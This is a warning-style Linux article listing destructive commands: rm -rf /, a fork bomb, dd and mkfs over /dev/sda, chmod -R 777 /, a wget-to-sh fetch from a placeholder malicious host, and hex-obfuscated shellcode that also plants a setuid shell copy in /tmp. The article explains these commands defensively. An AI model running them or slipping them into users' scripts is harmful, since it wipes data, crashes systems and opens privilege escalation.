The command-line interface is a powerful and handy utility for administering a Linux system. It provides a fast and versatile way of running the system, especially when managing headless systems which do not have a graphical interface.
While useful in managing your system, the command line is fraught with risks. Running bad commands can cause harm and irrecoverable damage to your system. In this guide, we have compiled a list of some of the riskiest commands that you should not think of executing on your system.
1. rm -rf / Command
The rm command is a Linux command used to delete files and directories depending on the arguments used. However, extreme caution should be taken when using the rm command as a slight typo or mistake can result in unrecoverable system damage.
When executed as root with the -rf /
option, the command recursively deletes all files and directories on your system starting from the root (/)
which is the highest in the Linux File Hierarchy structure. In a nutshell, the rm -rf /
command completely wipes out your system resulting in a broken and unrecoverable system.
The some of options used with the rm command are.
- rm command in Linux is used to delete files.
- rm -r command deletes the folder recursively, even the empty folder.
- rm -f command removes ‘Read only File’ without asking.
- rm -rf / : Force deletion of everything in the root directory.
- rm -rf * : Force deletion of everything in the current directory/working directory.
- rm -rf . : Force deletion of current folder and subfolders.
In fact, when you run the command as a regular user, you will get two warnings on the terminal.
To overcome accidental deletion of files by the ‘rm‘ command, create an alias of the ‘rm’ command as ‘rm -i’ in the “.bashrc” file, it will ask you to confirm every deletion.
2. :(){:|:&};: Command
The above is actually a fork bomb. It operates by creating a function called ':'
, which calls itself twice, once in the foreground and once in the background. The function executes repeatedly and in doing so, consumes all the system resources resulting in a system crash.
In fact, a fork bomb command is essentially a form of DoS (Denial-of-Service) attack. It is also referred to as the Wabbit or Rabbit virus. The worst part is that you don’t need to be root to launch this attack.
Thankfully, you can shield yourself from this attack by limiting the number of processes run by local users to around 4000.
You can do this by running the command:
$ ulimit -S -u 4000
You can later verify this using the command:
$ ulimit -u
3. command > /dev/sda
Running a command followed by >/dev/sda
overwrites the /dev/sda
block on your hard drive. This block contains filesystem data and when overwritten, results in a damaged system that is irrecoverable.
4. mv folder /dev/null
Another harmful operation that you should not try is moving a directory or file to /dev/null
. The /dev/null
file is a special type of file known as the null device or “the black hole“. Anything that is moved to /dev/null
is discarded and destroyed.
The following command moves all the contents of the user’s home directory to /dev/null
, consequently discarding all the data contained in the user’s home directory
# mv /home/user/* /dev/null
5. wget http://malicious_source -O- | sh
The wget command is a command that downloads files from a web or file server. The above command downloads a script from a malicious source and then executes it.
6. mkfs.ext3 /dev/sda
The mkfs command creates a new filesystem (either ext2, ext3, ext4, etc) on a formatted storage device, in most cases a partition of a hard disk drive. Running the mkfs command on a partition wipes all the data stored in it.
While useful in formatting disk partitions, formatting an entire drive (such as mkfs.ext3 /dev/sda) crashes the system and leaves it in an irrecoverable state. This happens because it destroys all the system files alongside your personal data.
The command can also take other forms as shown below.
# mkfs.ext4 /dev/sda # mkfs.xfs /dev/sda # mkfs.btrfs /dev/sda
7. > file Command
The >
file wipes out a file’s content and leaves it blank. It is synonymous with the cat /dev/null > file command. Caution should therefore be taken when using the redirection operators in a Linux system.
Below is a demonstration of how this command overwrites a text file. You can imagine the disaster that this command would cause when the file involved is a configuration file.
8. ^foo^bar
The ^foo^bar
command is as dangerous as it is useful depending on how it is executed. While it allows you to edit previously executed commands and execute them again, it can be disastrous if you are not keen on the changes made to the commands before running them.
9. dd if=/dev/random of=/dev/sda
The above command wipes out the /dev/sda block and writes random junk data to the block. Your system would be left at an inconsistent and unrecoverable stage.
10. Chmod -R 777 /
While it may not immediately crash your Linux system, the chmod -R 777 /
command recursively assigns all permissions (read, write and execute) to all files on your Linux system starting from the root.
This effectively exposes all critical configuration files and other files to all users and this poses a huge security risk to your system. Anyone with nefarious intentions can tinker with crucial files and easily break your system.
11. The Hidden Command
The below command is nothing but the first command above (rm -rf)
. Here the codes are hidden in hex so that an ignorant user may be fooled. Running the below code in your terminal will wipe your root partition.
This command here shows that the threat may be hidden and not normally detectable sometimes. You must be aware of what you are doing and what would be the result. Don’t compile/run codes from an unknown source.
char esp[] __attribute__ ((section(“.text”))) /* e.s.p release */ = “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″ “\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″ “\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″ “\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″ “\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″ “\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″ “\x6e\x2f\x73\x68\x00\x2d\x63\x00″ “cp -p /bin/sh /tmp/.beyond; chmod 4755 /tmp/.beyond;”;
Note: Don’t execute any of the above commands in your Linux terminal or shell or on your friend or school computer. If you want to test them, run them on a virtual machine.
Any inconsistency or data loss, due to the execution of the above command will break your system down for which, neither the Author of the article nor Tecmint is responsible.
That’s all for now. I will soon be here again with another interesting article you people will love to read. Till then Stay tuned and connected to Tecmint.
If you know any other such Dangerous Linux Commands and you would like us to add them to the list, please tell us via the comment section, and don’t forget to give your valuable feedback.